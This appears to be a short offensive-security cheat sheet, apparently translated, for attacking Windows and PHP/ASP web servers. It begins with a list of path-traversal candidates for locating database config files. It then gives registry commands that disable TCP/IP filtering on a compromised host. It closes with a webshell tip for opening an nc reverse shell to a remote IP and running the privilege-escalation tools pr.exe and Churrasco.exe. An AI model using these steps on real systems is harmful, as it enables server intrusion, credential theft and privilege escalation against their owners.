/config/conn.php ./config/conn.php ../../config/conn.php ../config/conn.php ../../../config/conn.php
/config/conn.asp ./config/conn.asp ../../config/conn.asp ../config/conn.asp ../../../config/conn.asp
/data/config.php ../../data/config.php ../data/config.php ../../../data/config.php
/data/config.inc.php ./data/config.inc.php ../../data/config.inc.php ../data/config.inc.php ../../../data/config.inc.php
/data/conn.php ./data/conn.php ../../data/conn.php ../data/conn.php ../../../data/conn.php
/data/conn.asp ./data/conn.asp ../../data/conn.asp ../data/conn.asp ../../../data/conn.asp
/include/config.php ../../include/config.php ../include/config.php ../../../include/config.php
/include/config.inc.php ./include/config.inc.php ../../include/config.inc.php ../include/config.inc.php ../../../include/config.inc.php
/include/conn.php ./include/conn.php ../../include/conn.php ../include/conn.php ../../../include/conn.php
/include/conn.asp ./include/conn.asp ../../include/conn.asp ../include/conn.asp ../../../include/conn.asp
/inc/config.php ../../inc/config.php ../inc/config.php ../../../inc/config.php
/inc/config.inc.php ./inc/config.inc.php ../../inc/config.inc.php ../inc/config.inc.php ../../../inc/config.inc.php
/inc/conn.php ./inc/conn.php ../../inc/conn.php ../inc/conn.php ../../../inc/conn.php
/inc/conn.asp ./inc/conn.asp ../../inc/conn.asp ../inc/conn.asp ../../../inc/conn.asp
/index.php ./index.php ../../index.php ../index.php ../../../index.php
/index.asp ./index.asp ../../index.asp ../index.asp ../../../index.asp
Removing TCP/IP filtering:
TCP/IP filtering is stored in three places in the registry (CurrentControlSet is an alias of whichever ControlSet00N is active, so one of the three overlaps):
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
Export each key with the following commands:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
Then in all three files change:
"EnableSecurityFilters"=dword:00000001
to:
"EnableSecurityFilters"=dword:00000000
and import the three files back with:
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
Webshell privilege-escalation tip:
cmd path:
c:\windows\temp\cmd.exe
With nc in the same directory, a reverse cmd shell such as:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
usually does not work.
But entering the nc path in the webshell's cmd-path field:
c:\windows\temp\nc.exe
and only the arguments in the command field:
-vv ip 999 -e c:\windows\temp\cmd.exe
does work. That is not the main point, though:
pr.exe and Churrasco.exe usually also have to be run the same way (binary in the cmd-path field, arguments in the command field) before they succeed.